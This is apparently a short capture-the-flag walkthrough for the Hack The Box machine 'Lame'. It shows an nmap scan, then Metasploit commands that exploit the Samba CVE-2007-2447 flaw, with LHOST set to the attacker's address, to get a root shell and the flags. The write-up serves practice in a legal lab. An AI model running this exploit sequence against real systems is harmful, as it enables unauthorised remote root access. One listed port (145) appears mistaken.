LAME WALKTHROUGH: Hack The Box

Aditya Jha
Oct 27, 2024

First things first: we boot up the machine and our attacker system.

Once we have the IP address of the machine, we start with an Nmap scan:

Command: nmap -sC -sV -T5 <Target IP>

The scan shows that ports 21, 22, 139 and 145 are open.

There is a 2007 CVE, CVE-2007-2447, that allows remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf.

We can use Metasploit to exploit this vulnerability.

Command: msfconsole

In Metasploit, we can search for the CVE.

Command: search CVE 2007 2447

Now we can use this module to exploit:

use 0
show options
set RHOST <Target IP>
set LHOST <Attacker IP>
run

We are all set to exploit. The “run” command launches the exploit and creates a shell.

bash -i

Now we are logged in as root.

Now we can find the flags and submit the machine.

The user flag is in the /home/makis directory.

And the root flag is in the /root directory.

We got all the flags.

This was a very easy and small machine. Hope you enjoyed solving it.

If you want to reach out to me, you can check the bio for links to connect.
